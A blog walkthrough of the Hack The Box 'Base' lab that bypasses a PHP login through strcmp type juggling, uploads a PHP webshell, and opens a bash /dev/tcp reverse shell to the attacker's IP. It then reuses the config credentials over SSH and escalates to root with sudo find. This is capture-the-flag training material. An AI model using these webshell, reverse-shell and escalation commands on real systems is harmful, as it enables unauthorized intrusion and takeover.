The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

posted on 13.6.2023 by Below Surface in "Hack The Box"

Port scan first. Exchange ip with your machines IP address:

sudo nmap -sV ip

Relevant output:

22/tcp open ssh   OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http  Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Then we check out the website and have special interest for the login page. We can check if directory listing is enabled on the target server, which is a security issue. Just remove "login.php" from the URL, so it reads:


And we can see three files:

config.php2022-06-04 16:24  61   
login.php2022-06-15 11:23 7.4K  
login.php.swp2022-06-04 17:09  16K 

The login.php.swp file is of special interest, because it is a file that should not be there. Swap files provide changes that were made to the buffer. Probably the text editor crashed while someone was editing the file login.php and the thereby created swap file was not noticed by the developers or admins. Let's see the content! Just click on the file in the directory listing and it should download automatically. Then:

cd Downloads
cat login.php.swp

To output this more readable, run:

strings login.php.swp

We can understand the code, but it still looks weird. The PHP login code seems to be upside down, so we use tac to read the content like cat, but backwards. The interesting part is this:

if (strcmp($username , $_POST['username']) == 0) {
if (strcmp($password, $_POST['password']) == 0) {

The username and password provided by the user are compared with a username and password variable, coming from the config.php file and the strcmp() function will return the value 0 if the values match. This is implemented insecure, because if we submit an empty array it will return NULL. And in PHP the == operator only checks the value for equality. The value of Null is 0, even if the type is not the same. The correct operator would have been the === operator, which also checks for types and not only values. This is called Type Juggling Bugs.

To exploit this vulnerability, we will intercept the POST request of a login attempt with BurpSuite and then modify it to include two arrays at the end of the username and password variable. Then, in theory, any credentials should work.

Fire up BurpSuite:


And enable intercepting in the Proxy tab. Then configure your browser to use the manual proxy of:

Port 8080
set a checkmark for https

Or just use the BurpSuite browser, by clicking on "Open browser".

Then, catch a login attempt with any credentials and manipulate this line:


To be:


Then click "Forward" until all requests have been forwarded. The browser should now have been redirected to /upload.php. We are now logged in to the Admin File Uploads page.

Let's create a simple .php file to check if PHP code will be executed, if we upload it.

cd temp
echo "<?php phpinfo(); ?>" > test.php

Then upload the file via the website and forward the request, if BurpSuite interception is still enabled. You should get a success message at the top right corner of the website. Now we need to figure out where the file was uploaded to. We do this with Gobuster:

gobuster dir --url http://ip/ --wordlist /usr/share/wordlists/dirb/big.txt

Relevant output:

/_uploaded            (Status: 301) [Size: 320] [--> http://ip/_uploaded/]

Like before, we can use directory listing to check the files in that folder:


And there we find the test.php file we uploaded. Click on it to see, that in fact the PHP code we submitted was executed. Time for a simple shell!

cd temp
sudo nano webshell.php


<?php echo system($_REQUEST['cmd']);?>
ctrl + o // to save
enter // to confirm
ctrl + x // to exit

Like we did before, we also upload the newly created webshell.php file and execute it from the directory listing, by clicking on it. Nothing gets displayed yet, but we modify the URL to:


And the output now is something like:

uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

Do another request to this URL, but catch it with BurpSuite this time. Then hit

ctrl + r 

to send it to the Repeater, so we can modify and re-send it easily. Our goal now is to get a proper reverse shell. To do this, we change the intercepted GET request to POST. Simply right click onto the Request body and select "Change request method". The first line should now read:

POST /_uploaded/webshell.php HTTP/1.1

We also modify the value of the cmd parameter in the last line. Exchange ip with your tun0 inet IP address:

cmd=/bin/bash -c 'bash -i >& /dev/tcp/ip/443 0>&1'

Now, URL encode this payload in BurpSuite, by marking everything after the equal symbol and then pressing

ctrl + u

Before sending this modified request, fire up Netcat on port 443:

sudo nc -lvnp 443 


listening on [any] 443 ...

Now, send the request by clicking "Send" in BurpSuite. The Netcat window should output:

connect to [...] from (UNKNOWN) [...] 57640
bash: cannot set terminal process group (1124): Inappropriate ioctl for device
bash: no job control in this shell

Now we can finally see the content of the config.php file:

cat /var/www/html/login/config.php


$username = "admin";
$password = "thisisagoodpassword";

Let's also check for users on this system:

ls /home



The port scan at the beginning showed us, that port 22 (SSH) is open on the target machine. Let's try out our credentials via SSH. In a new terminal run:

ssh john@ip
password: thisisagoodpassword

Success! Get the user flag:

cat user.txt

Now let's see the which sudo privileges our user has:

sudo -l


User john may run the following commands on base:
  (root : root) /usr/bin/find

This is another misconfiguration, because we are able to run a binary with elevated privileges. This command will escalate the privileges that our user has:

sudo find . -exec /bin/sh \; -quit

See the provided resource (GTFOBins) for more info about this.

Time to view the root flag:

cat /root/root.txt


hack the box
reverse shell


More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box